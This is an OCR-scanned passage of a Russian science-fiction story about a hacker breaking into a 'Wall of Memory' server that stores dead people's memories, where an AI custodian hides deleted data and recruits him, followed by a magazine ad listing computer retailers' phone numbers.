ваиваются имена, вычислить если не с точностью до единицы, то хотя бы 
примерно каталог, в котором может быть его личный «слепок», и заставить 
программу ошибиться при чтении этого каталога, переписав его и завалив 
это место на винчестере информационным мусором. 

Он, конечно, понимал, что при этом может пострадать и куча других фай- 
лов, но самый обыкновенный, почти детский, страх за то, что все его шалос- 
ти и проступки сейчас в цифровом виде доступны совершенно неизвестному 
кругу людей, подстегивал его лучше всякого кнута. 

Он вошел в систему, соблюдая все меры предосторожности — цепочка 
анонимных прокси-серверов существенно замедляла работу, но делала ее на 
девяносто девять процентов неотслеживаемой. Структура базы данных была 
более чем непонятной; потыкавшись, как слепой котенок, в разные каталоги, 
он призадумался. 

- Наворотили, блин, эти монстры, - протянул он, закинув руки за голову и 
откинувшись на спинку кресла. — Чего же делать? 

Попытавшись найти документы, созданные вчера примерно в одиннад- 
цать часов утра, когда он сам был там, на приеме, Вербицкий наткнулся в 
итоге на список из примерно шести тысяч документов самых разных разме- 
ров и расширений. Работа по распаковке их содержимого оказалась просто 
невыполнимой. Многие из файлов были запаролены и наверняка сигнализи- 
ровали системному администратору о попытке их открытия — Вербицкий ра- 


зочарованно смотрел на все эти файловые залежи, даже не пытаясь прикос- 
нуться курсором ни к одному из них. 

В этот самый момент Брагин вышел из дома и направился к Стене Памя- 
ти. На дорогу ему было необходимо около пятидесяти минут. Он это знал и 
сознательно не спешил на автобус, стараясь растянуть сомнительное удо- 
вольствие более чем на час. 
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Парк был пустынен в этот час. Основная масса людей прибывала к кре- 
маторию после обеда; Брагин шел едва ли не в полном одиночестве, не 
смотря по сторонам и разглядывая лишь листву, стелящуюся ему под ноги. В 
полукилометре от него, за небольшой сосновой рощицей, вырисовывался 
контур крематория — большая, вытянутая по диагонали, против всех законов 
физики, стела из черного с красными прожилками гранита. Два входа, нес- 
колько автобусов, пара автомобилей. Неподалеку от обоих входов — неболь- 
шие группы людей, переминающихся с ноги на ногу; каждый второй нервно 
курит, женщины закутаны в черные платки, на земле, прислоненные к коле- 
сам автобусов, стоят венки. 

Очередные траурные церемонии ждут своей очереди. 

Брагин не стал приближаться, свернул направо, туда, где не успевшее 
еще подняться высоко над горизонтом солнце отбрасывало длинные тени от 
высокой и тонкой, не более метра в толщину, Стены Памяти. Около трехсот- 
четырехсот метров были видны отсюда Брагину; все остальное, примерно 
еще столько же, скрывали сосны. 

По уже давно известному пути Брагин, срезав несколько поворотов, при- 
гибаясь под ветками сосен, приблизился к Стене в том месте, где на первом 
ярусе, на уровне человеческих голов, была захоронена урна с прахом Дани- 
лы. Газон, тщательно убранный и постриженный, напоминал искусственный; 
Брагин осторожно приблизился в зону досягаемости датчиков, сунул руку в 
карман и достал очки. 

Рядом с ним, метрах в двадцати, стояла пожилая женщина, глядящая 
прямо перед собой на стену и шевелящая губами. На ней были точно такие 
же очки; она вела одной ей видимый диалог с кем-то, кто был ей дорог при 
жизни. Поймав себя на том, что он невольно подглядывает и пытается по гу- 
бам прочитать, что же женщина говорит, Брагин заставил себя надеть очки и 
повернуться лицом к фотографии Данилы. 

Маленький наушник, повисший над ушной раковиной, тихонько пискнул. 
Стало намного темнее; очки не просто изменяли освещенность - они облада- 
ли какой-то способностью практически полностью убивать солнечный свет. 
На пару секунд Брагин даже потерял из виду фотографию Строгина и плохо 
себе представлял, куда же смотреть, но внезапно прямо перед ним из возду- 
ха стала прорисовываться голова — яркие искрящиеся лучики, вырывающие- 
ся из камеры в стене, рисовали трехмерное изображение Данилы. 

- Хай, бледнолицый, - сказали губы, нарисованные в воздухе. — Что-то ты 
часто... 

- Привет, - ответил Брагин. — Ты же знаешь, все дела, дела... 

Голова тихо кивнула, в уголках рта притаилась грустная улыбка. Брагина 
немного затрясло — побочный эффект, с которым он никак не мог справить- 
ся. Адреналин, будь он неладен — невозможно в себе побороть первобытный 
страх общения с мертвецами. 

- Ты вчера спрашивал...- начал было Данила, но Брагин его остановил. 

- Понимаешь, мне очень нужен ответ. Очень. Мне и нашим ребятам. 
Группа просто зашивается... 

Он не мог оторвать глаз ото лба Данилы, от того места, где увидел пол- 
года назад рану от пули снайпера. Именно Брагин нашел Данилу уже мертво- 
го, унесшего в могилу все свои тайны; именно поэтому он больше всего 60- 
ялся ходить к Стене, помня лужу крови вокруг его головы. 

- Ответ? — Данила изумленно поднял брови. — Прости, но я так и не по- 
нял, о чем ты говоришь... 

- Вспоминай, Данила, вспоминай... Четыре сервера давно уже положены 
на обе лопатки, еще два дожидаются наших действий. Их мы гарантированно 
грохнем, остается тот, над которым работал ты, тот, в Мексике... Черт, вся 
информация осталась в твоей голове, Данила! И эти проклятые деньги рабо- 
тают, гибнут люди! Вспоминай, черт тебя побери! 

Строгин нахмурился. Тон Брагина сбивал с мысли искусственный интел- 
лект программы, которая в очередной раз проходила своими сканерами по 
недрам Даниловой памяти и не находила ничего, связанного с какими-то 
серверами, Мексикой и гибелью людей... 
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- Смотри, смотри, - человек оторвался от чашки кофе и кивнул напарнику 
на монитор. — Система сигнализирует... 
- Вижу, - холодно отзывался тот. — Отслеживаю. 


Клавиши он нажимал, не отрывая глаз от экрана, на котором выстраива- 
лась какая-то непонятная постороннему человеку разноцветная схема. Вре- 
менами он прищуривал глаза, выхватывая одному ему понятные и нужные 
куски информации; в такие времена нажатия на клавиши становились реже, 
но ненамного. Отмахнувшись от назойливого осеннего комара, невесть как 
проникнувшего в это закрытое круглые сутки помещение, он в последний раз 
клацнул на «ЕМТЕВ» и указал на монитор. 

- Вот. Это он. 

- Пытается выведать у Стены деструктивную информацию? 

- Точно. Надо зафиксировать разговор и сообщить куда следует. Чем 
раньше, тем лучше. 

- Погоди, - остановил его старший смены, отвлекшийся от своего мони- 
тора и подошедший к ним совершенно незаметно. — Ну-ка, отойди в сторо- 
Hy. 

Он опустился в освободившееся кресло, взглянул в глаза своих коллег — 
они виновато отвернулись, он быстро ввел несколько букв и цифр разного 
регистра, получив более полный допуск к процедурам. Редкий сухой кашель 
курильщика сопровождал его путешествие по базе данных, периодически он 
бросал взгляд на монитор, на котором мужчина в кожаном плаще беседовал 
с призраком Данилы Строгина, скончавшегося и подключенного к базе в 2007 
году. 

Внезапно он хмыкнул и откатился в кресле от стола. Колесики жалобно 
скрипнули, когда он резко развернулся и оказался лицом к своей смене. 

- Наблюдение прекратить, запись разговора уничтожить, содержание 
разговора под страхом... под страхом чего хотите забыты!!! 

- Дамы и не слушали, - попытался оправдаться тот, чьи действия так 
взволновали старшего. 

- Вот и хорошо... - закусив губу, в последний раз кинул взгляд на шеве- 
лящего губами мужчину на экране и переключил камеру слежения на какую- 
то женщину, молча смотрящую перед собой и держащую в руках букетик 


Временами по спине пробегал хо- 
лодок - OH находился сейчас в нес- 
рах «мертвого города», как сам он 
окрестил этот сервер Стены Памяти. 


гвоздик. Встав с кресла, он вернулся на свое место, тяжело опустился в 
кресло и вздохнул: 

- Всем бы такой уровень допуска... Даже у меня такого нет... 

Парни с его смены смотрели на своего начальника, привыкшего быть 
всесильным на своем месте, ставшего даже как-то ниже ростом от того, что 
нашелся кто-то, кто имел право задать вопрос и уйти безнаказанным — даже 
если ответ на него получить в принципе не мог. 

Именно в этот момент, момент растерянности и потери в центре управ- 
ления Стеной внимания к происходящему, Алексей Вербицкий нашел ката- 
лог, озаглавленный «Special Access Only». 
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Брагин оглянулся по сторонам, увидел скамейку, отошел от Стены, при- 
сел. Компьютер, оценив степень удаленности объекта, выключил «призрак». 
Покачав головой, Брагин снял очки, как и в прошлый раз (да как и всегда), 
потер переносицу, будто снимая со своего лица жуткую усталость. 

Ничего не получалось. Ему вдруг пришло в голову, что и получиться-то не 
может в принципе (как близок он был к истине!). Он подумал, что все его 
старания напрасны, что группа вынуждена будет собрать в кучу весь свой ин- 
теллект и попытаться пройти дорогой Строгина — вот только сколько понадо- 
бится на это времени, трудно было себе представить. 

Сигарета сама перекочевал из пачки ему в рот, какой-то мятный дымок 
потянулся из уголка рта ветром («Что за дрянь я сегодня купил...»). 

- Остается одно — идти к руководству и получать карт-бланш, - сказал 
Брагин, словно советуясь сам с собой. — Пусть дают доступ к базе напря- 
мую. Непосредственно к матрице Данилы... Но тогда вся наша секретность 
летит к чертовой матери. 

Он сильно сомневался в том, что руководство позволит себе так подста- 
виться — хотя это решало проблему целиком и полностью. Надо всего лишь 
поработать с полчасика со Строгинской матрицей, и проблема будет решена, 
этот проклятый мексиканский банк расстелится перед ним, как последняя 
шлюха. И они взорвут мир... А точнее сказать, поставят его на место. 

Он вытащил из кармана мобильник и нажал определенную комбинацию 
клавиш, заученную раз и навсегда. Спустя пару гудков ему ответили: 

- Здравствуйте, это Брагин... Возникла проблема. Под угрозой выполне- 
ние акции... Да, постараюсь вкратце обрисовать случившееся... » 


х 
= 
= 
о 
= 
6 
6 
о 


SPECIAL ACCESS ONLY 


4 
5 
= 
о 
Ee 
6 
8 
о 


SPECIAL ACCESS ONLY 


Он очень четко, практически по-военному изложил суть проблемы, выс- 
лушал сухую тираду о том, почему до сих пор ничего не было озвучено, как 
идиот признался в том, что до последнего надеялся на беседу со Строги- 
НЫМ... 

На том конце мобильного моста замолчали надолго. 

Потом властный голос точно так же, по-военному, ибо никак иначе было 
нельзя, объяснил Брагину, почему проблему подобным путем решить невоз- 
можно. Брагин слушал его, постепенно приходя в ужас. 

МАТРИЦА ДАНИЛЫ СТРОГИНА НИЧЕГО НЕ ПОМНИЛА. 

Вот почему такими идиотскими выглядели все разговоры о компьютерах! 
Деструктивная информация, вырезанная такой осторожной и охраняющей са- 
му себя Стеной Памяти! 

Он еле сдержался, чтобы не швырнуть телефон в стену. 

- Будь она неладна, эта самая Память! — прошипел он, старясь не закри- 
чать на весь мемориальный парк. — Где я теперь возьму эти чертовы скрип- 
ты, которые так здорово работали у Строгина и без которых мы все как без 
pyk!? 

Ответа He было. Брагин едва сдержался, чтобы не раздавить в кулаке очки... 
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Алексей так и не понял, в чем заключается этот самый special access. По- 
началу он решил, что здесь спрятана какая-то совершенно уж секретная и та- 
инственная информация, для доступа к которой нужны привилегии самого 
высокого ранга. Но это оказалось не так. 

Доступ в каталог был СВОБОДНЫМ. Но этого было мало. Вербицкий за- 
метил, что обращение к файлам в этом каталоге происходит очень и очень 
часто, время обновления содержимого менялось едва ли не каждую минуту 
сразу у нескольких сот файлов — а всего их здесь было много, много тысяч. 


Стена Памяти перезагружалась, 
восстанавливая свой 
искусственный интеллект из 
резервных файлов. 


Имена — безликие, множество цифр, букв, значков. Некоторые из них 
выделялись тем, что время от времени цвет имени менялся на красный — это 
сразу бросалось в глаза; Вербицкий невольно удивился этому, но не более. 

Временами по спине пробегал холодок — он находился сейчас в недрах 
«мертвого города», как сам он окрестил этот сервер Стены Памяти. Склады- 
валось впечатление, что он, глядя на бесконечно обновляющиеся файлы это- 
го каталога, видит, как Стена живет и общается с людьми, пришедшими к 
ней... 

- Общается с людьми... — попробовал на вкус это словосочетание Bep- 
бицкий. — А ведь очень похоже... 

Он пощелкал по файлам — безрезультатно. Попытки скачать их себе на 
комп успеха тоже не имели. 

Внезапно на экране появилось сообщение, оформленное достаточно нео- 
бычно — при первом же взгляде на окошко, выскочившее перед глазами Вер- 
бицкого, было ясно, что оно — порождение Стены, а никак не компьютера 
Алексея. 

Во-первых, оно отличалось от всего того, что когда-то видел Вербицкий, 
своей формой - оно было овальным. Никаких «Закрыть» и «Свернуть», только 
тонкая оранжевая граница и бледно-серый фон. Дурацкое сочетание цветов. 

И на фоне всего этого — фраза «ЗАЧЕМ ВЫ ЗДЕСЬ?». 

А под ней — чистая строка для ответа. 

- Воти приплыли, - присвистнул Алексей, поняв, что его кто-то вычис- 
лил. Но руки опередили сознание. 

«Найти свой файл», - отстучал он в ответ. 

«Кто вы?» 

Hy, уж на этот вопрос ответить было бы глупо. 

«Не бойтесь, я помогу». 

- Ну-ну, - покачал головой Вербицкий. — Наверное, мне пора, пока не 
вычислили с точностью до метра, где я нахожусь. 

Он уже собирался отключиться, как вдруг стало ясно, что делать этого 
уже не стоит. На экране горел его домашний адрес, фамилия, имя, возраст — 
короче, все паспортные данные. Вербицкий на секунду закрыл глаза и вдруг 
понял, что очень хочет пить. 

- Теперь вы должны ответить, зачем вы ищите файл со своей матрицей. 

- Чтобы уничтожить», - ответил Алексей, так как терять уже было нечего. 

- Зачем? 


- Стыдно. 

- За что? 

- Там есть за что... 

- Atak не думаю. Файл мной изучен более чем досконально. Поверьте, 
Алексей, ваша работа того не стоит. У меня есть к вам встречное предложе- 
ние. 

- С кем я говорю? 

- Читайте внимательно и следуйте моим инструкциям. 
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Брагин встал со скамейки, посмотрел на часы. До автобуса еще остава- 
лось около пятнадцати минут, можно было подойти к Даниле и сказать ему 
«До свиданья». Правда, теперь Брагин не знал, когда он появится здесь сно- 
ва. 

Очки воцарились на переносице, вспыхнула голограмма Строгина. Но 
Брагин даже не успел открыть рот. Данила сделал какое-то неуловимое дви- 
жение головой, останавливая речь коллеги. 

- Слушай и записывай, - сказал он, закусив губу и оглядевшись вокруг, 
словно он был в состоянии видеть хоть что-то, будучи голограммой. — Да- 
лась вам эта чертова Мексика... Все гораздо проще... 

Брагин едва успел достать из внутреннего кармана портативный компью- 
тер и включить на нем диктофон... 
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Вербицкий сделал все, что ему указывали на экране строки, появляющи- 
еся с завидной периодичностью, словно кто-то прекрасно был осведомлен 
060 всех нажатиях клавиш на компе у Алексея и следил за выполнением по- 
шаговых инструкций, сидя рядом с ним на стуле. Что-то произошло после 
этого в недрах большого виртуального кладбища, несколько файлов исчезли 
из общего списка и переместились в указанный каталог. 

- Спасибо. 

- Не за что. Я все равно не понял, что делаю. 

- Небольшой комментарий. Каталог, в который ты вошел, полон той са- 
мой деструктивной информации, которую вырезают из файлов матриц при 
ее обнаружении... Эту информацию положено уничтожать. Мне удалось пря- 
тать ее, беречь и время от времени пользоваться — для собственной же бе- 
зопасности. С тобой мне было интересно работать — всегда приятно иметь 
дело с талантливым противником, тем более когда его цель, по большому 
счету, смешна и нелепа... 

- Кудая переместил файлы? 

- Туда, где они были всего нужнее, — в матрицу человека, от знаний и 
умений которого сейчас зависят судьбы миллионов людей в этом мире. 

- Почему я? 

- Потому что у меня нет на это прав. Все, что я умею, — не давать другим 
уничтожить знания и пользоваться ими самой... Возвращать их назад мне не 
под силу. 

- Самой?.. Кто ты? 

- Извини. Я нарушила ход событий. Могут возникнуть серьезные сбои в 
работе. Я должна исправить все, что ты сделал. Вернуть на место те файлы, 
которым не место в широком доступе. Восстановить свою защиту. Вышвыр- 
нуть тебя, наконец, отсюда. 

- Кто ты?! 

Экран мигнул и погас. 

Стена Памяти перезагружалась, восстанавливая свой искусственный ин- 
теллект из резервных файлов. 
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Звонок в дверь вывел Вербицкого из состояния ступора, в котором он 
пребывал уже около часа. Он встал и хотел пойти к дверям, но мать его опе- 
редила: 

- Кого? Квартира Вербицких? Да... Алексея? A вы кто? 

Потом несколько слов Алексей не разобрал, но понял, что за ним уже 
пришли. 

- Вот попал так попал... 

Дверь в комнату распахнулась, на пороге стоял незнакомый человек в ко- 
жаном плаще. 

- Здравствуйте, - кивнул он Алексею. — Моя фамилия Брагин. Не хотите 
немного поработать? У меня о вас самые лучшие рекомендации... 

Он включил диктофон на воспроизведение. Стена Памяти голосом Дани- 
лы Строгина предложила ему работу в команде... 
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Москва: АБ-групп (095) 745-5175; Акситек (095) 784-7224; Банкос (095) 128-9022; ДЕЛ (095) 250-5536; Дилайн (095) 969-2222; Инкотрейд (095) 176-2873; ИНЭЛ (095) 742-6436; Карин (095) 956-1158; 
Компьютерный салон SMS (095) 956-1225; Компания КИТ (095) 777-6655; Никс (095) 974-3333; ОЛДИ (095) 105-0700; Регард (095) 912-4224; Сетевая Лаборатория (095) 784-6490; 
СКИД (095) 232-3324; Тринити Электроникс (095) 737-8046; Формоза (095) 234-2164; Ф-Центр (095) 472-6104; ЭЛСТ (095) 728-4060; Flake (095) 236-992; Force Computers (095) 775-6655; 
ISM (095) 718-4020; Meijin (095) 727-1222; NT Computer (095) 970-1930; R-Style Trading (095) 514-1414; USN Computers (095) 755-8202; ULTRA Computers (095) 729-5255; ЭЛЕКТОН (095) 956-3819; 
ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Texkom (8612) 699-850; Воронеж: Pet (0732) 779-339; РИАН (0732) 512-412; Сани (0732) 54-00-00; 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285; 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Гаском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300; 


Тюмень: ИНЭКС-Техника (3452) 390-036. 
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Тонкость и легкость - 
решающие преимущества! 
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Будь лидером! 
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